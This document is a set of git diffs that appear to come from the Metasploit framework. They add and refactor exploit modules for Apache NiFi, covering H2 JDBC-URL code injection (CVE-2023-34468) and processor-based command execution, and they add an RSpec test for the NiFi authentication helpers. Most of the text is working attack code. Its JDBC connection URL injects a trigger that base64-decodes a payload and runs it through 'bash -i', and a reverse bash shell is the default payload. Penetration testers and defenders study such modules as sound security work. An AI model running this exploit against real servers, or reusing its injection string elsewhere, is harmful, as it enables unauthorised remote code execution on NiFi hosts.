+          This exploit will result in several shells (5-7).
+          Successfully tested against Apache nifi 1.20.0
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'h00die', # msf module
+          'Matei "Mal" Badanoiu' # discovery, POC
+        ],
+        'References' => [
+          ['CVE', '2023-34468'],
+          ['URL', 'https://lists.apache.org/thread/7b82l4f5blmpkfcynf3y6z4x1vqo59h8'],
+          ['URL', 'https://issues.apache.org/jira/browse/NIFI-11653'],
+          # not many h2 references on the Internet, especially for nifi, so leaving this here
+          # ['URL', 'https://gist.github.com/ijokarumawak/ed9085024eeeefbca19cfb2f20d23ed4#file-table_record_change_detection_example-xml-L65']
+          # ['URL', 'http://www.h2database.com/html/features.html']
+        ],
+        'DisclosureDate' => '2023-06-12',
+        'DefaultOptions' => { 'RPORT' => 8443 },
+        'Platform' => %w[unix],
+        'Arch' => [ARCH_CMD],
+        'Targets' => [
+          [
+            'Unix (In-Memory)',
+            {
+              'Type' => :unix_memory,
+              'Payload' => { 'BadChars' => '"' },
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
+            }
+          ],
+        ],
+        'Privileged' => false,
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES]
+        }
+      )
+    )
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The base path', '/nifi-api']),
+        OptString.new('DRIVER', [true, 'Location of the H2 driver', '/opt/nifi/nifi-toolkit-current/lib/h2-2.1.214.jar']), # 1.20.0
+        OptInt.new('DELAY', [true, 'The delay (s) before stopping and deleting the processor', 10])
+      ],
+      self.class
+    )
+  end
+
+  def disable_dbconnectionpool
+    body = {
+      'disconnectedNodeAcknowledged' => false,
+      'state' => 'DISABLED',
+      'uiOnly' => true,
+      'revision' => {
+        'clientId' => 'x',
+        'version' => 0
+      }
+    }
+    opts = {
+      'method' => 'PUT',
+      'uri' => normalize_uri(target_uri.path, 'controller-services', @db_con_pool, 'run-status'),
+      'ctype' => 'application/json',
+      'data' => body.to_json
+    }
+    opts['headers'] = { 'Authorization' => "Bearer #{@token}" } if @token
+    response = send_request_cgi(opts)
+    check_response("PUTting disable status for db connection pool #{@db_con_pool}", response, 200)
+  end
+
+  def delete_dbconnectionpool
+    version = 0
+    opts = {
+      'method' => 'DELETE',
+      'uri' => normalize_uri(target_uri.path, 'controller-services', @db_con_pool),
+      'vars_get' => {
+        'version' => version
+      }
+    }
+    opts['headers'] = { 'Authorization' => "Bearer #{@token}" } if @token
+    response = send_request_cgi(opts)
+    while response.code == 400 && response.body.include?('is not the most up-to-date revision') && version <= 20
+      version += 1
+      vprint_status("Found newer revision of #{@db_con_pool}, attempting to delete version #{version}")
+      opts['vars_get'] = { 'version' => version }
+      response = send_request_cgi(opts)
+    end
+    check_response("DELETing db connection pool #{@processor}", response, 200)
+  end
+
+  def create_dbconnectionpool
+    @db_con_pool_name = Rex::Text.rand_text_alphanumeric(6..10)
+    body = {
+      'revision' =>
+          {
+            'clientId' => 'x',
+            'version' => 0
+          },
+      'disconnectedNodeAcknowledged' => false,
+      'component' => {
+        'type' => 'org.apache.nifi.dbcp.DBCPConnectionPool',
+        'bundle' => {
+          'group' => 'org.apache.nifi',
+          'artifact' => 'nifi-dbcp-service-nar',
+          # XXX this needs to be updated to the version we find
+          'version' => '1.20.0'
+        },
+        'name' => @db_con_pool_name
+      }
+    }
+    opts = {
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'process-groups', @process_group, 'controller-services'),
+      'ctype' => 'application/json',
+      'data' => body.to_json
+    }
+    opts['headers'] = { 'Authorization' => "Bearer #{@token}" } if @token
+    response = send_request_cgi(opts)
+    check_response("POSTing processor #{@processor} configuration", response, 201, 'id')
+  end
+
+  def enable_dbconpool
+    body = {
+      'disconnectedNodeAcknowledged' => false,
+      'state' => 'ENABLED',
+      'uiOnly' => true,
+      'revision' => {
+        'clientId' => 'x',
+        'version' => 0
+      }
+    }
+    opts = {
+      'method' => 'PUT',
+      'uri' => normalize_uri(target_uri.path, 'controller-services', @db_con_pool, 'run-status'),
+      'ctype' => 'application/json',
+      'data' => body.to_json
+    }
+    opts['headers'] = { 'Authorization' => "Bearer #{@token}" } if @token
+    response = send_request_cgi(opts)
+    check_response("PUTting start status for db connection pool #{@db_con_pool}", response, 200)
+  end
+
+  def start_processor
+    body = {
+      'state' => 'RUNNING', 'disconnectedNodeAcknowledged' => false,
+      'revision' => {
+        'clientId' => 'x',
+        'version' => 0
+      }
+    }
+    opts = {
+      'method' => 'PUT',
+      'uri' => normalize_uri(target_uri.path, 'processors', @processor, 'run-status'),
+      'ctype' => 'application/json',
+      'data' => body.to_json
+    }
+    opts['headers'] = { 'Authorization' => "Bearer #{@token}" } if @token
+    response = send_request_cgi(opts)
+    check_response("PUTting processor #{@processor} configuration", response, 200)
+  end
+
+  def configure_dbconpool
+    # our base64ed payload can't have = in it, so we'll pad out with spaces to remove them
+    b64_pe = ::Base64.strict_encode64(payload.encoded)
+    equals_count = b64_pe.count('=')
+    if equals_count > 0
+      b64_pe = ::Base64.strict_encode64(payload.encoded + ' ' * equals_count)
+    end
+
+    body = {
+      'disconnectedNodeAcknowledged' => false,
+      'component' => {
+        'id' => @db_con_pool,
+        'name' => @db_con_pool_name,
+        'bulletinLevel' => 'WARN',
+        'comments' => '',
+        'properties' => {
+          # https://github.com/apache/nifi/pull/7349/files#diff-66ccc94a6b0dfa29817ded9c18e5a87c4fff9cd38eeedc3f121f6436ba53e6c0R38
+          # we can use a random db name here, the file is created automatically
+          # XXX would mem work too?
+          'Database Connection URL' => "jdbc:h2:file:/tmp/#{Rex::Text.rand_text_alphanumeric(6..10)}.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER #{Rex::Text.rand_text_alpha_upper(6..12)} BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash -c {echo,#{b64_pe}}|{base64,-d}|{bash,-i}')\n$$--=x",
+          'Database Driver Class Name' => 'org.h2.Driver',
+          # This seems to be installed by default, do we need the location?
+          'database-driver-locations' => '/opt/nifi/nifi-toolkit-current/lib/h2-2.1.214.jar', # 1.20.0 and 1.21.0, this is a required field to get the controller to start
+          "Max Total Connections": '1' # prevents us from getting multiple callbacks
+        },
+        'sensitiveDynamicPropertyNames' => []
+      },
+      'revision' => {
+        'clientId' => 'x',
+        'version' => 0
+      }
+    }
+    opts = {
+      'method' => 'PUT',
+      'uri' => normalize_uri(target_uri.path, 'controller-services', @db_con_pool),
+      'ctype' => 'application/json',
+      'data' => body.to_json
+    }
+    opts['headers'] = { 'Authorization' => "Bearer #{@token}" } if @token
+    response = send_request_cgi(opts)
+    check_response("PUTting db connection pool #{@processor} configuration", response, 200)
+  end
+
+  def configure_processor
+    body = {
+      # "disconnectedNodeAcknowledged"=> false,
+      'component' => {
+        'id' => @processor,
+        'name' => Rex::Text.rand_text_alphanumeric(6..10),
+        'bulletinLevel' => 'WARN',
+        'comments' => '',
+        'config' => {
+          'autoTerminatedRelationships' => ['failure', 'success'],
+          'bulletinLevel' => 'WARN',
+          'comments' => '',
+          'concurrentlySchedulableTaskCount' => '1',
+          'executionNode' => 'ALL',
+          'penaltyDuration' => '30 sec',
+          'retriedRelationships' => [],
+          'schedulingPeriod' => '0 sec',
+          'schedulingStrategy' => 'TIMER_DRIVEN',
+          'yieldDuration' => '1 sec',
+          'state' => 'STOPPED',
+          'properties' => {
+            'Database Connection Pooling Service' => @db_con_pool,
+            'SQL select query' => 'SELECT H2VERSION() FROM DUAL;' # innocious get version query, field required to be non-blank
+          }
+        }
+      },
+      'revision' => {
+        'clientId' => 'x',
+        'version' => 1
+      }
+    }
+    opts = {
+      'method' => 'PUT',
+      'uri' => normalize_uri(target_uri.path, 'processors', @processor),
+      'ctype' => 'application/json',
+      'data' => body.to_json
+    }
+    opts['headers'] = { 'Authorization' => "Bearer #{@token}" } if @token
+    response = send_request_cgi(opts)
+    check_response("PUTting processor #{@processor} configuration", response, 200)
+  end
+
+  def check
+    # see apache_nifi_processor_rce check method for details on why this is difficult
+
+    @cleanup_required = false
+
+    response = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'access', 'config') })
+    if !response
+      CheckCode::Unknown
+    else
+      body = response.get_json_document
+      if !body.key?('config')
+        CheckCode::Safe
+      elsif body['config']['supportsLogin']
+        CheckCode::Detected
+      else
+        CheckCode::Appears
+      end
+    end
+  end
+
+  def validate_config
+    return if datastore['BEARER-TOKEN'].to_s.empty? || datastore['USERNAME'].to_s.empty?
+
+    fail_with(Failure::BadConfig, 'Specify EITHER Bearer-Token OR Username')
+  end
+
+  def cleanup
+    return unless @cleanup_required
+
+    # Wait for thread to execute - This seems necesarry, especially on Windows
+    # and there is no way I can see of checking whether the thread has executed
+    print_status("Waiting #{datastore['DELAY']} seconds before stopping and deleting")
+    sleep(datastore['DELAY'])
+
+    # Stop Processor
+    stop_processor(@token, @processor)
+    vprint_good("Stopped and terminated processor #{@processor}")
+
+    # Delete processor
+    delete_processor(@token, @processor, 3)
+    vprint_good("Deleted processor #{@processor}")
+    disable_dbconnectionpool
+    vprint_good("Disabled db connection pool #{@db_con_pool}, sleeping #{datastore['DELAY']} seconds to allow the connection to finish disabling")
+    sleep(datastore['DELAY'])
+    delete_dbconnectionpool
+    vprint_good("Deleted db connection pool #{@db_con_pool}")
+  end
+
+  def exploit
+    validate_config
+
+    # Check whether login is required and set/fetch token
+    if supports_login
+      if datastore['BEARER-TOKEN'].to_s.empty? && datastore['USERNAME'].to_s.empty?
+        fail_with(Failure::BadConfig,
+                  'Authentication is required. Bearer-Token or Username and Password must be specified')
+      end
+      @token = if datastore['BEARER-TOKEN'].to_s.empty?
+                 retrieve_login_token
+               else
+                 datastore['BEARER-TOKEN']
+               end
+    else
+      @token = false
+    end
+
+    # Retrieve root process group
+    @process_group = fetch_root_process_group(@token)
+    vprint_good("Retrieved process group: #{@process_group}")
+
+    @db_con_pool = create_dbconnectionpool
+
+    @cleanup_required = true
+
+    # Create processor in root process group
+    @processor = create_processor(@token, @process_group, 'org.apache.nifi.processors.standard.ExecuteSQL')
+    vprint_good("Created processor #{@processor} in process group #{@process_group}")
+    configure_processor
+    vprint_good("Configured processor #{@processor}")
+    configure_dbconpool
+    vprint_good("Configured db connection pool #{@db_con_pool_name} (#{@db_con_pool})")
+    enable_dbconpool
+    vprint_good('Enabling db connection pool')
+    start_processor
+    vprint_good('Starting processor')
+  end
+end

--- a/modules/exploits/linux/http/apache_nifi_h2_rce.rb
+++ b/modules/exploits/linux/http/apache_nifi_h2_rce.rb
@@ -211,10 +211,18 @@ class MetasploitModule < Msf::Exploit::Remote
     # Delete processor
     delete_processor(@token, @processor, 3)
     vprint_good("Deleted processor #{@processor}")
-    stop_dbconnectionpool(@token, @db_con_pool)
+    begin
+      stop_dbconnectionpool(@token, @db_con_pool)
+    rescue DBConnectionPoolError
+      fail_with(Failure::UnexpectedReply, 'Unable to stop DB Connection Pool. Manual cleanup is required')
+    end
     vprint_good("Disabled db connection pool #{@db_con_pool}, sleeping #{datastore['DELAY']} seconds to allow the connection to finish disabling")
     sleep(datastore['DELAY'])
-    delete_dbconnectionpool(@token, @db_con_pool)
+    begin
+      delete_dbconnectionpool(@token, @db_con_pool)
+    rescue DBConnectionPoolError
+      fail_with(Failure::UnexpectedReply, 'Unable to delete DB Connection Pool. Manual cleanup is required')
+    end
     vprint_good("Deleted db connection pool #{@db_con_pool}")
   end
 
@@ -239,13 +247,19 @@ class MetasploitModule < Msf::Exploit::Remote
     if @version.nil?
       @version = get_version
     end
+    fail_with(Failure::NoAccess, 'Invalid Credentials') if @token.nil?
 
     # Retrieve root process group
     @process_group = fetch_root_process_group(@token)
     vprint_good("Retrieved process group: #{@process_group}")
 
     @db_con_pool_name = Rex::Text.rand_text_alphanumeric(6..10)
-    @db_con_pool = create_dbconnectionpool(@token, @db_con_pool_name, @process_group, @version)
+    begin
+      @db_con_pool = create_dbconnectionpool(@token, @db_con_pool_name, @process_group, @version)
+    rescue DBConnectionPoolError
+      fail_with(Failure::UnexpectedReply,
+                'Unable to create DB Connection Pool. Manual review of HTTP packets will be required to debug failure.')
+    end
 
     @cleanup_required = true
 
@@ -256,9 +270,20 @@ class MetasploitModule < Msf::Exploit::Remote
     vprint_good("Configured processor #{@processor}")
     configure_dbconpool
     vprint_good("Configured db connection pool #{@db_con_pool_name} (#{@db_con_pool})")
-    start_dbconnectionpool(@token, @db_con_pool)
-    vprint_good('Enabling db connection pool')
-    start_processor(@token, @processor)
-    vprint_good('Starting processor')
+    begin
+      start_dbconnectionpool(@token, @db_con_pool)
+    rescue DBConnectionPoolError
+      fail_with(Failure::UnexpectedReply,
+                'Unable to start DB Connection Pool. Manual review of HTTP packets will be required to debug failure.')
+    end
+    vprint_good('Enabled db connection pool')
+    begin
+      start_processor(@token, @processor)
+    rescue ProcessorError
+      fail_with(Failure::UnexpectedReply,
+                'Unable to start Processor. Manual review of HTTP packets will be required to debug failure.')
+    end
+
+    vprint_good('Started processor')
   end
 end

--- a/modules/exploits/linux/http/apache_nifi_h2_rce.rb
+++ b/modules/exploits/linux/http/apache_nifi_h2_rce.rb
@@ -131,9 +131,10 @@ class MetasploitModule < Msf::Exploit::Remote
         'comments' => '',
         'properties' => {
           # https://github.com/apache/nifi/pull/7349/files#diff-66ccc94a6b0dfa29817ded9c18e5a87c4fff9cd38eeedc3f121f6436ba53e6c0R38
-          # we can use a random db name here, the file is created automatically if we write to disk. However, we can be more clean
+          # we can use a random db name here, the file is created automatically if we write to disk. However, we can be cleaner
           # by using mem here instead of file
-          'Database Connection URL' => "jdbc:h2:mem:#{Rex::Text.rand_text_alpha_upper(6..12)};TRACE_LEVEL_SYSTEM_OUT=0\\;CREATE TRIGGER #{Rex::Text.rand_text_alpha_upper(6..12)} BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash -c {echo,#{b64_pe}}|{base64,-d}|{bash,-i}')\n$$--=x",
+          # $$ is used as the code start/stop block.
+          'Database Connection URL' => "jdbc:h2:mem:#{Rex::Text.rand_text_alpha_upper(6..12)};TRACE_LEVEL_SYSTEM_OUT=0\\;CREATE TRIGGER #{Rex::Text.rand_text_alpha_upper(6..12)} BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash -c {echo,#{b64_pe}}|{base64,-d}|{bash,-i}')\n$$",
           'Database Driver Class Name' => 'org.h2.Driver',
           # This seems to be installed by default, do we need the location?
           'database-driver-locations' => driver,

--- a/modules/exploits/multi/http/apache_nifi_processor_rce.rb
+++ b/modules/exploits/multi/http/apache_nifi_processor_rce.rb
@@ -135,15 +135,15 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def validate_config
-    return if datastore['BEARER-TOKEN'].to_s.empty? || datastore['USERNAME'].to_s.empty?
-
-    fail_with(Failure::BadConfig, 'Specify EITHER Bearer-Token OR Username')
+    if datastore['BEARER-TOKEN'].to_s.empty? && datastore['USERNAME'].to_s.empty?
+      fail_with(Failure::BadConfig,
+                'Authentication is required. Bearer-Token or Username and Password must be specified')
+    end
   end
 
   def cleanup
-    return unless @cleanup_required
-
     super
+    return unless @cleanup_required
 
     # Wait for thread to execute - This seems necesarry, especially on Windows
     # and there is no way I can see of checking whether the thread has executed
@@ -168,26 +168,22 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    validate_config
-
     # Check whether login is required and set/fetch token
     if supports_login?
-      if datastore['BEARER-TOKEN'].to_s.empty? && datastore['USERNAME'].to_s.empty?
-        fail_with(Failure::BadConfig,
-                  'Authentication is required. Bearer-Token or Username and Password must be specified')
-      end
+      validate_config
       @token = if datastore['BEARER-TOKEN'].to_s.empty?
                  retrieve_login_token
                else
                  datastore['BEARER-TOKEN']
                end
+      fail_with(Failure::NoAccess, 'Invalid Credentials') if @token.nil?
     else
-      @token = false
+      @token = nil
     end
-    fail_with(Failure::NoAccess, 'Invalid Credentials') if @token.nil?
 
     # Retrieve root process group
     process_group = fetch_root_process_group(@token)
+    fail_with(Failure::UnexpectedReply, 'Unable to retrieve root process group') if process_group.nil?
     vprint_good("Retrieved process group: #{process_group}")
 
     @cleanup_required = true
@@ -195,6 +191,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # Create processor in root process group
     begin
       @processor = create_processor(@token, process_group)
+      fail_with(Failure::UnexpectedReply, 'Unable to create a new processor') if @processor.nil?
     rescue ProcessorError
       fail_with(Failure::UnexpectedReply,
                 'Unable to create processor. Manual review of HTTP packets will be required to debug failure.')

--- a/modules/exploits/multi/http/apache_nifi_processor_rce.rb
+++ b/modules/exploits/multi/http/apache_nifi_processor_rce.rb
@@ -5,7 +5,6 @@
 
 # Potential Improvements:
 # Add option to authenticate using client certificate
-# Add a scanner module?
 
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
@@ -74,7 +73,7 @@ class MetasploitModule < Msf::Exploit::Remote
     )
     register_options(
       [
-        OptString.new('TARGETURI', [true, 'The base path', '/nifi-api']),
+        OptString.new('TARGETURI', [true, 'The base path', '/']),
         OptInt.new('DELAY', [
           true,
           'The delay (s) before stopping and deleting the processor',
@@ -101,7 +100,7 @@ class MetasploitModule < Msf::Exploit::Remote
     }
     opts = {
       'method' => 'PUT',
-      'uri' => normalize_uri(target_uri.path, 'processors', @processor),
+      'uri' => normalize_uri(target_uri.path, 'nifi-api', 'processors', @processor),
       'ctype' => 'application/json',
       'data' => body.to_json
     }
@@ -123,18 +122,14 @@ class MetasploitModule < Msf::Exploit::Remote
 
     @cleanup_required = false
 
-    response = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'access', 'config') })
-    if !response
+    login_type = supports_login?
+
+    if !login_type
       CheckCode::Unknown
+    elsif login_type
+      CheckCode::Detected('Apache NiFi instance supports logins')
     else
-      body = response.get_json_document
-      if !body.key?('config')
-        CheckCode::Safe
-      elsif body['config']['supportsLogin']
-        CheckCode::Detected
-      else
-        CheckCode::Appears
-      end
+      CheckCode::Appears('Apache NiFi instance does not support logins')
     end
   end
 
@@ -165,7 +160,7 @@ class MetasploitModule < Msf::Exploit::Remote
     validate_config
 
     # Check whether login is required and set/fetch token
-    if supports_login
+    if supports_login?
       if datastore['BEARER-TOKEN'].to_s.empty? && datastore['USERNAME'].to_s.empty?
         fail_with(Failure::BadConfig,
                   'Authentication is required. Bearer-Token or Username and Password must be specified')

--- a/modules/exploits/multi/http/apache_nifi_processor_rce.rb
+++ b/modules/exploits/multi/http/apache_nifi_processor_rce.rb
@@ -5,12 +5,14 @@
 
 # Potential Improvements:
 # Add option to authenticate using client certificate
+# Add a scanner module?
 
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   prepend Msf::Exploit::Remote::AutoCheck
   include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HTTP::Nifi
 
   def initialize(info = {})
     super(
@@ -65,16 +67,14 @@ class MetasploitModule < Msf::Exploit::Remote
         'Notes' => {
           'Stability' => [CRASH_SAFE],
           'Reliability' => [REPEATABLE_SESSION],
-          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES]
+          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES],
+          'NOCVE' => ['abusing a feature']
         }
       )
     )
     register_options(
       [
         OptString.new('TARGETURI', [true, 'The base path', '/nifi-api']),
-        OptString.new('USERNAME', [false, 'Username to authenticate with']),
-        OptString.new('PASSWORD', [false, 'Password to authenticate with']),
-        OptString.new('BEARER-TOKEN', [false, 'JWT authenticate with']),
         OptInt.new('DELAY', [
           true,
           'The delay (s) before stopping and deleting the processor',
@@ -83,54 +83,6 @@ class MetasploitModule < Msf::Exploit::Remote
       ],
       self.class
     )
-  end
-
-  def check_response(description, response, expected_response_code, item = '')
-    # Check that response was received
-    fail_with(Failure::Unreachable, "Unable to retrieve HTTP response from API when #{description}") unless response
-    # Check that response code was expected
-    if response.code != expected_response_code
-      fail_with(Failure::UnexpectedReply,
-                "Unexpected HTTP response code from API when #{description} " \
-                "(received #{response.code}, expected #{expected_response_code})")
-    end
-    # Check that item can be retrieved
-    return if item.empty?
-
-    body = response.get_json_document
-    unless body.key?(item)
-      fail_with(Failure::UnexpectedReply, "Unable to retrieve #{item} from HTTP response when #{description}")
-    end
-    body[item]
-  end
-
-  def supports_login
-    response = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'access', 'config') })
-    config = check_response('GETting access configuration', response, 200, 'config')
-    config['supportsLogin']
-  end
-
-  def fetch_process_group
-    opts = { 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'process-groups', 'root') }
-    opts['headers'] = { 'Authorization' => "Bearer #{@token}" } if @token
-    response = send_request_cgi(opts)
-    check_response('GETting root process group', response, 200, 'id')
-  end
-
-  def create_processor(process_group)
-    body = {
-      'component' => { 'type' => 'org.apache.nifi.processors.standard.ExecuteProcess' },
-      'revision' => { 'version' => 0 }
-    }
-    opts = {
-      'method' => 'POST',
-      'uri' => normalize_uri(target_uri.path, 'process-groups', process_group, 'processors'),
-      'ctype' => 'application/json',
-      'data' => body.to_json
-    }
-    opts['headers'] = { 'Authorization' => "Bearer #{@token}" } if @token
-    response = send_request_cgi(opts)
-    check_response("POSTing new processor in process group #{process_group}", response, 201, 'id')
   end
 
   def configure_processor(command)
@@ -156,37 +108,6 @@ class MetasploitModule < Msf::Exploit::Remote
     opts['headers'] = { 'Authorization' => "Bearer #{@token}" } if @token
     response = send_request_cgi(opts)
     check_response("PUTting processor #{@processor} configuration", response, 200)
-  end
-
-  def stop_processor
-    # Attempt to stop process
-    body = { 'revision' => { 'clientId' => 'x', 'version' => 1 }, 'state' => 'STOPPED' }
-    opts = {
-      'method' => 'PUT',
-      'uri' => normalize_uri(target_uri.path, 'processors', @processor, 'run-status'),
-      'ctype' => 'application/json',
-      'data' => body.to_json
-    }
-    opts['headers'] = { 'Authorization' => "Bearer #{@token}" } if @token
-    response = send_request_cgi(opts)
-    check_response("PUTting processor #{@processor} stop command", response, 200)
-
-    # Stop may not have worked (but must be done first). Terminate threads now
-    opts = { 'method' => 'DELETE', 'uri' => normalize_uri(target_uri.path, 'processors', @processor, 'threads') }
-    opts['headers'] = { 'Authorization' => "Bearer #{@token}" } if @token
-    response = send_request_cgi(opts)
-    check_response("DELETEing processor #{@processor} terminate threads command", response, 200)
-  end
-
-  def delete_processor
-    opts = {
-      'method' => 'DELETE',
-      'uri' => normalize_uri(target_uri.path, 'processors', @processor),
-      'vars_get' => { 'version' => 3 }
-    }
-    opts['headers'] = { 'Authorization' => "Bearer #{@token}" } if @token
-    response = send_request_cgi(opts)
-    check_response("DELETEting processor #{@processor}", response, 200)
   end
 
   def check
@@ -223,17 +144,6 @@ class MetasploitModule < Msf::Exploit::Remote
     fail_with(Failure::BadConfig, 'Specify EITHER Bearer-Token OR Username')
   end
 
-  def retrieve_token
-    response = send_request_cgi(
-      {
-        'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'access', 'token'),
-        'vars_post' => { 'username' => datastore['USERNAME'], 'password' => datastore['PASSWORD'] }
-      }
-    )
-    check_response('POSTing credentials', response, 201)
-    response.body
-  end
-
   def cleanup
     return unless @cleanup_required
 
@@ -243,11 +153,11 @@ class MetasploitModule < Msf::Exploit::Remote
     sleep(datastore['DELAY'])
 
     # Stop Processor
-    stop_processor
+    stop_processor(@token, @processor)
     vprint_good("Stopped and terminated processor #{@processor}")
 
     # Delete processor
-    delete_processor
+    delete_processor(@token, @processor, 3)
     vprint_good("Deleted processor #{@processor}")
   end
 
@@ -261,7 +171,7 @@ class MetasploitModule < Msf::Exploit::Remote
                   'Authentication is required. Bearer-Token or Username and Password must be specified')
       end
       @token = if datastore['BEARER-TOKEN'].to_s.empty?
-                 retrieve_token
+                 retrieve_login_token
                else
                  datastore['BEARER-TOKEN']
                end
@@ -270,13 +180,13 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     # Retrieve root process group
-    process_group = fetch_process_group
+    process_group = fetch_root_process_group(@token)
     vprint_good("Retrieved process group: #{process_group}")
 
     @cleanup_required = true
 
     # Create processor in root process group
-    @processor = create_processor(process_group)
+    @processor = create_processor(@token, process_group)
     vprint_good("Created processor #{@processor} in process group #{process_group}")
 
     # Generate command

--- a/modules/exploits/multi/http/apache_nifi_processor_rce.rb
+++ b/modules/exploits/multi/http/apache_nifi_processor_rce.rb
@@ -151,11 +151,19 @@ class MetasploitModule < Msf::Exploit::Remote
     sleep(datastore['DELAY'])
 
     # Stop Processor
-    stop_processor(@token, @processor)
+    begin
+      stop_processor(@token, @processor)
+    rescue ProcessorError
+      fail_with(Failure::UnexpectedReply, 'Unable to stop processor. Manual cleanup is required')
+    end
     vprint_good("Stopped and terminated processor #{@processor}")
 
     # Delete processor
-    delete_processor(@token, @processor, 3)
+    begin
+      delete_processor(@token, @processor, 3)
+    rescue ProcessorError
+      fail_with(Failure::UnexpectedReply, 'Unable to stop processor. Manual cleanup is required')
+    end
     vprint_good("Deleted processor #{@processor}")
   end
 
@@ -176,6 +184,7 @@ class MetasploitModule < Msf::Exploit::Remote
     else
       @token = false
     end
+    fail_with(Failure::NoAccess, 'Invalid Credentials') if @token.nil?
 
     # Retrieve root process group
     process_group = fetch_root_process_group(@token)
@@ -184,7 +193,12 @@ class MetasploitModule < Msf::Exploit::Remote
     @cleanup_required = true
 
     # Create processor in root process group
-    @processor = create_processor(@token, process_group)
+    begin
+      @processor = create_processor(@token, process_group)
+    rescue ProcessorError
+      fail_with(Failure::UnexpectedReply,
+                'Unable to create processor. Manual review of HTTP packets will be required to debug failure.')
+    end
     vprint_good("Created processor #{@processor} in process group #{process_group}")
 
     # Generate command

--- a/modules/exploits/multi/http/apache_nifi_processor_rce.rb
+++ b/modules/exploits/multi/http/apache_nifi_processor_rce.rb
@@ -105,8 +105,9 @@ class MetasploitModule < Msf::Exploit::Remote
       'data' => body.to_json
     }
     opts['headers'] = { 'Authorization' => "Bearer #{@token}" } if @token
-    response = send_request_cgi(opts)
-    check_response("PUTting processor #{@processor} configuration", response, 200)
+    res = send_request_cgi(opts)
+    fail_with(Failure::Unreachable, 'No response received') if res.nil?
+    fail_with(Failure::UnexpectedReply, "Unexpected HTTP response code received #{res.code}") unless res.code == 200
   end
 
   def check
@@ -124,13 +125,13 @@ class MetasploitModule < Msf::Exploit::Remote
 
     login_type = supports_login?
 
-    if !login_type
-      CheckCode::Unknown
-    elsif login_type
-      CheckCode::Detected('Apache NiFi instance supports logins')
-    else
-      CheckCode::Appears('Apache NiFi instance does not support logins')
+    return CheckCode::Unknown('Unable to determine if logins are supported') if login_type.nil?
+
+    if login_type
+      return CheckCode::Appears('Apache NiFi instance supports logins')
     end
+
+    CheckCode::Detected('Apache NiFi instance does not support logins')
   end
 
   def validate_config
@@ -141,6 +142,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def cleanup
     return unless @cleanup_required
+
+    super
 
     # Wait for thread to execute - This seems necesarry, especially on Windows
     # and there is no way I can see of checking whether the thread has executed

--- a/spec/lib/msf/core/exploit/http/nifi/auth_spec.rb
+++ b/spec/lib/msf/core/exploit/http/nifi/auth_spec.rb
@@ -1,0 +1,84 @@
+# -*- coding:binary -*-
+
+require 'spec_helper'
+
+RSpec.describe Msf::Exploit::Remote::HTTP::Nifi::Auth do
+  subject do
+    mod = ::Msf::Module.new
+    mod.extend described_class
+    mod
+  end
+
+  let(:valid_code) do
+    200
+  end
+
+  describe '#nifi auth supports_login' do
+    it 'returns nil if page can not be reached' do
+      allow(subject).to receive(:send_request_cgi) do
+        res = Rex::Proto::Http::Response::E404.new
+        res
+      end
+
+      expect(subject.supports_login?).to be_nil
+    end
+
+    it 'returns nil when key not available' do
+      allow(subject).to receive(:send_request_cgi) do
+        res = Rex::Proto::Http::Response.new
+        res.code = valid_code
+        res.body = '{"foo":"bar"}'
+        res
+      end
+
+      expect(subject.supports_login?).to be_nil
+    end
+
+    it 'returns true when true' do
+      allow(subject).to receive(:send_request_cgi) do
+        res = Rex::Proto::Http::Response.new
+        res.code = valid_code
+        res.body = '{"config":{"supportsLogin":true}}'
+        res
+      end
+
+      expect(subject.supports_login?).to be true
+    end
+  end
+
+  describe '#nifi auth retrieve_login_token' do
+    it 'returns nil if page can not be reached' do
+      allow(subject).to receive(:send_request_cgi) do
+        res = Rex::Proto::Http::Response::E404.new
+        res
+      end
+
+      expect(subject.retrieve_login_token).to be_nil
+    end
+
+    it 'returns nil on bad login' do
+      allow(subject).to receive(:send_request_cgi) do
+        res = Rex::Proto::Http::Response.new
+        res.code = 400
+        res.body = 'The supplied username and password are not valid.'
+        res
+      end
+
+      expect(subject.retrieve_login_token).to be_nil
+    end
+
+    it 'returns access token on successful login' do
+      allow(subject).to receive(:send_request_cgi) do
+        res = Rex::Proto::Http::Response.new
+        res.code = 201
+        # 1142 in length for version 1.21.0
+        res.body = ('eyJraWQiOiIzNzhiOWUwYS0wOGJlLTRiNW-tYThhNi0yOWZhM2Y3Yz_4NmMiLCJhbGciOiJQUzUxMiJ9.eyJzdWIi' * 12) +
+                   'OiJlN2U2OGRhMy1jZmQ1LTQ0YTYtOTdlOS1iYWFlYzg1ZDM2MTQiLCJhdWQiOi'
+        res
+      end
+
